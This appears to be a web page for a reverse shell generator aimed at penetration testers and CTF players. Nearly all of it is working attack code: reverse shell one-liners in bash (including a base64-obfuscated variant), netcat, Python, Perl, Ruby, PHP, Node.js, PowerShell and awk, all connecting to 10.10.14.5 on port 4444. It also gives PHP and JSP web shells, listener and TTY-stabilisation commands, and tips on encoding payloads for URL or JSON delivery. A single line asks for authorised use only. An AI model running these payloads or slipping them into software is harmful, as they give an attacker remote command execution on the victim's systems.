Tools / Reverse Shell Generator
Reverse Shell Generator
Set listener IP, port, and target shell once. Every payload below - bash, nc with mkfifo, python, perl, ruby, PHP, Node, PowerShell, awk, plus matching listeners -updates instantly. Use only on systems you are explicitly authorized to test (CTFs, your own labs, engagements with written scope).
Shell
- bash (TCP)
/bin/bash -i >& /dev/tcp/10.10.14.5/4444 0>&1
- bash (URL-safe)
/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'
- bash via base64
echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjUvNDQ0NCAwPiYx | base64 -d | /bin/bash
- nc (mkfifo, classic)
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.14.5 4444 > /tmp/f
- nc -e (when available)
nc 10.10.14.5 4444 -e /bin/bash
- ncat --ssl
ncat --ssl 10.10.14.5 4444 -e /bin/bash
Scripting
- Python 3
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.14.5",4444));[os.dup2(s.fileno(),f) for f in (0,1,2)];pty.spawn("/bin/bash")' - Python 2
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])' - Perl
perl -e 'use Socket;$i="10.10.14.5";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};' - Ruby
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("10.10.14.5","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' - PHP
php -r '$sock=fsockopen("10.10.14.5",4444);exec("/bin/bash <&3 >&3 2>&3");' - Node.js
node -e '(function(){var net=require("net"),cp=require("child_process"),sh=cp.spawn("/bin/bash",[]);var c=new net.Socket();c.connect(4444,"10.10.14.5",function(){c.pipe(sh.stdin);sh.stdout.pipe(c);sh.stderr.pipe(c);});})();' - PowerShell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.5',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" - Awk
awk 'BEGIN {s = "/inet/tcp/0/10.10.14.5/4444"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
Web
- PHP web shell (one-liner)
<?php system($_GET["cmd"]); ?>
- JSP web shell
<%@ page import="java.util.*,java.io.*"%><%if(request.getParameter("cmd")!=null){Process p=Runtime.getRuntime().exec(request.getParameter("cmd"));BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));String s;while((s=br.readLine())!=null) out.println(s);}%>
Listener
- Listener: nc
nc -lvnp 4444
- Listener: socat (PTY)
socat file:`tty`,raw,echo=0 tcp-listen:4444
- Listener: pwncat-cs
pwncat-cs -lp 4444
- Stabilize TTY (after callback)
python3 -c 'import pty; pty.spawn("/bin/bash")' && export TERM=xterm && stty raw -echo; fg
Quick reference
Start a listener first, then trigger the payload from the target. The classic flow:
- On your box:
nc -lvnp 4444. - On the target: trigger any of the payloads (typically the bash TCP one if
/dev/tcpis available, or the python3 PTY variant if not). - After callback, stabilize the TTY with the listed command so Ctrl-C and arrow keys work.
If the payload is going through a URL parameter or HTTP header, run it through the URL Encoder first; if it goes through a JSON body, the Base64 tool is handy for wrapping the inner shell command. For Flask-based RCE chains, also check the Flask Session Decoder to confirm session state before/after.